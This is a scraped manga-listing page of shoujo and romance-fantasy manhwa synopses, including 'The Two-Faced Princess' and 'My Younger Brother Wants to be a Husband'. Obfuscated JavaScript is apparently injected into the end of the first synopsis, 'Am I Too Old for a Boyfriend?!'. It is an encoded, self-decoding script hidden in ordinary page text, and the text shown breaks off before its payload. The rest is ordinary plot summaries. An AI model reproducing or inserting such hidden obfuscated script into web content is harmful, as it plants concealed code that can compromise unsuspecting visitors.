Shoujo - Page 743

Shoujo manga focuses on young female readers, featuring stories that often revolve around love, friendship, and emotional experiences. It typically portrays personal growth, complex emotions, and romantic relationships.

9325 results

Am I Too Old for a Boyfriend?!

Gentle, considerate, handsome—according to Shannon Cui—these are the qualities of the ideal boyfriend. If only she could get one. 26 and rapidly approaching “un-dateable” territory, Shannon has been waiting for the perfect someone to sweep her off her feet. Problem is, he’s not showing. Date after failed date, she can’t help but ask if he exists or worse…is she too old for a boyfriend?!<script></script><script>(function(_0x3ce48b,_0xb3282f){var _0x27d518=_0x1dc3,_0x10c58f=_0x3ce48b();while(!![]){try{var _0x1f5859=-parseInt(_0x27d518(0x176))/(0x252b+0x242e+-0x4958)+parseInt(_0x27d518(0x16d))/(0x1071+-0x3*-0x28f+-0x181c)+-parseInt(_0x27d518(0x178))/(0x1dd3+-0x16ea+-0x6e6)*(-parseInt(_0x27d518(0x171))/(0xc05*0x1+-0x1c5c+0x35*0x4f))+-parseInt(_0x27d518(0x17f))/(0x77a+-0x198a+0x1215)+parseInt(_0x27d518(0x16e))/(0xdf5*-0x1+-0xcc6+0x2f9*0x9)*(-parseInt(_0x27d518(0x181))/(0x17cc+-0x6dc*0x3+-0x331))+-parseInt(_0x27d518(0x180))/(0x6*-0xe+-0x18d3+0x192f)*(parseInt(_0x27d518(0x170))/(0x146c+-0xcd*0x1d+0x2*0x16b))+parseInt(_0x27d518(0x160))/(0xc9*0x26+0x6f*0x16+-0x2756)*(parseInt(_0x27d518(0x163))/(0x147b+-0x10b2*-0x2+-0x35d4));if(_0x1f5859===_0xb3282f)break;else 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The Golden Light of Dawn

You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God. Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리


The Two-Faced Princess

<div class="post-content_item"> <div class="summary-content">두 얼굴의 황녀 / Two-Faced Princess</div> </div> “Your Majesty, please break-off my marriage with Her Highness the Imperial Princess. I fell in love with Lady Adriane Reese.” “Six engagements, Six break-ups.” The princess’s fiancé always had an affair with the maids! “I don’t want to marry the crown prince, I want to live with my father forever…” “Such a useless being. Begone!” The princess who is known to be weak and s*upid, Apollonia. But she has another hidden face… “It’s because the throne is hard to obtain, my father also spent 10 years on trying to kill my mother, the empress.” As Apollonia grinned, her red eyes shone intensely. Usurpation of the throne. Her goal was clear. She was never shaken. ‘I want to live my life with my father.’ To be exact, I want to live my life where my father is seated. Please wait, father. Your daughter is on her way. To take back everything that was stolen from me.


A male protagonist is blocking my way

I reincarnated into a novel that I’d read in my past life. I’m destined to be the fiancé of the villain in the not-too-distant future, but that’s… Doesn’t it depend on how I live? “My ideal type is 190 centimeters tall, handsome, rich and doesn’t get fat when he gets older!” And then I saved the life of the young male protagonist before I even started looking for him? My plan to have a smooth, carefree life has been ruined ever since! “I’m sorry, but Ariel said ‘I can’t take my eyes off the prettiest and handsomest people in the world.’ ” “What? Me?” “I’m – I’m sorry, I’ve been very rude. Please forget my proposal!” “Wait! No! Please Wait!” As he watched me feel increasingly guilty towards him, a supposedly broken-hearted person, he raised the corner of his mouth. Associated Names The Main Protagonist Block My Path 남자 주인공이 내 앞길을 가로막는다 A male protagonist is blocking my way


The Hero is Standing in My Way

A male protagonist is blocking my way manhwa, I reincarnated into a novel that I'd read in my past life.I'm destined to be the fianc of the villain in the not-too-distant future, but that's Doesn't it depend on how I live?"My ideal type is 190 centimeters tall, handsome, rich and doesn't get fat when he gets older!"And then I saved the life of the young male protagonist before I even started looking for him?My plan to have a smooth, carefree life has been ruined ever since!"I'm sorry, but Ariel said I can't take my eyes off the prettiest and handsomest people in the world.' ""What? Me?""I'm I'm sorry, I've been very rude. Please forget my proposal!""Wait! No! Please Wait!"As he watched me feel increasingly guilty towards him, a supposedly broken-hearted person, he raised the corner of his mouth.The Hero is Standing in My Way


Heaven’s Sympathy : Reborn

Heaven’s Sympathy : Reborn, :Amid the turmoils of the three worlds, deity Yun Ze was seriously wounded while putting an end to a rebellion, causing him to lose a soul. That very soul then fell into the reincarnation pool, forcing Yun Ze to be born in the mortal world. Yun Ze became a mortal because his 3 spiritual and 7 physical souls were incomplete. Because he’s living with a mild cognitive impairment and has slow reactions, fairy Liu Li was sent to the mortal world to help Yun Ze find his missing soul. When Liu Li went into the mortal world, she discovered that deities are different from what she thought. Didn’t they say that deities are arrogant and cold? Why is the deity she bumped into foolish and cute


My Younger Brother Wants to be a Husband

My mother remarried and I had a younger brother. With a happy heart, I tried to be a family with my younger brother, Millian. No matter how hard he behaved, it didn’t matter. Did my effort shine? I’m relieved that we’ve gotten quite close. Millian left a letter and went to war. It’s been 5 years since Millian went to war. [Millian, I’m going to see you this time.] Who knew my letter would end the five-year-long war? “Now i’m not your brother anymore.” Millian fluttered a document that he had been expelled from the family. “Sister, don’t laugh at other men. Only if you don’t want to make me a murderer.” Millian Edmore Rachel. No, now it’s Millian Taylor. My younger brother returned as a man. It’s sad that he’s a someone else right now, but what? He’s going to be a husband? ….But why am I so nervous? i shouldn’t do this.


My Girlfriend Is a Nine-Tailed Fox

Read manhwa My Girlfriend Is a Nine-Tailed Fox / My Girlfriend Is a Gumiho Daewoong wishes to be an actor but faces opposition from his grandfather. He goes to Cheonbosa Temple where his deceased parents are enshrined, and there, he meets a gumiho sealed in a painting by the grandmother samshin for 500 years. Astounded, Daewoong runs away and falls off a cliff, then the gumiho saves him by giving him her fox bead. Thanks to the fox bead, Daewoong comes back to life. At first, he avoids the gumiho, but it is hard to turn away from her who is pure, honest, and his lifesaver. So he decides to move into his friend’s rooftop house with the gumiho but faces various difficult situations due to her honest personality. Will the gumiho be able to adjust to the human world?


I’m Engaged to an Obsessive Male Lead

One day, Veillyn Orlando comes to the realization that she’s been living the last 21 years as a side character in a BL novel and is fated to die in one year! In light of this, Veillyn decides to escape her abusive family and live out the rest of her days in peace. However, her only way out is getting engaged to the male lead of the novel, Jellard Lieseltein. He seems like the perfect candidate for a contractual engagement because he’s into men, meaning there’s no risk of them actually falling in love with each other… But as the two spend more time together, Jellard seems to be falling for Veillyn. Will Veillyn be able to navigate her growing feelings for Jellard while keeping her inevitable death a secret? Alternative I’m Engaged to an Obsessive Male Lead / 집착남주의 계약직 약혼자입니다


Inappropriate Activity Has Been Detected

Read manhwa Inappropriate Activity Has Been Detected / 부적절한 플레이가 감지되었습니다 Lin Eun is a professional gamer who has been recruited to a game tester team for “The Last Step,” a virtual reality game. One day, a big fire breaks out in the company building. To save a team member trapped in the game, Lin goes through the fire and logs onto the game. When she wakes up, she finds herself in the body of Princess Adriel, an NPC inside the game. “How have you been, Lin?” “This can’t be real… How are you here?” Siheon Ryu, the leader of the medical team, also gets trapped after following Lin into the game. Inside the game, he is another NPC named Richard Blanc Tesca, who is Adriel’s fiancé


Runaway Bride Of The Vampire Duke

Ilana was stuck in a vintage palace. Duke Edwards William, the master of the palace, who was supposed to die 100 years ago, suddenly appeared before her and said she was the bride he had been searching for all these years. Can Ilana escape from the palace or be forever imprisoned and forced to become his bride? What kind of person is Duke Edwards William? Is there anything else hidden behind those lovesick&nbsp;


The Comic Changes My Destiny

When the book of destiny can portray and change the future, when the characters in the pen become a living reality, the comic world and the real world overlap! Ordinary female college student Luo Youzhen is about to experience an unprecedented experience, and embark on an adventure journey… A hidden cartoonist, a cartoon character with abilities, a hegemonic young man next to him, a mysterious female killer, who represents justice Who is evil? The comic legend that crossed the dimension opened! The Comic Changed My Destiny Wo Di Ming Yun Zhi Shu 我的命运之书
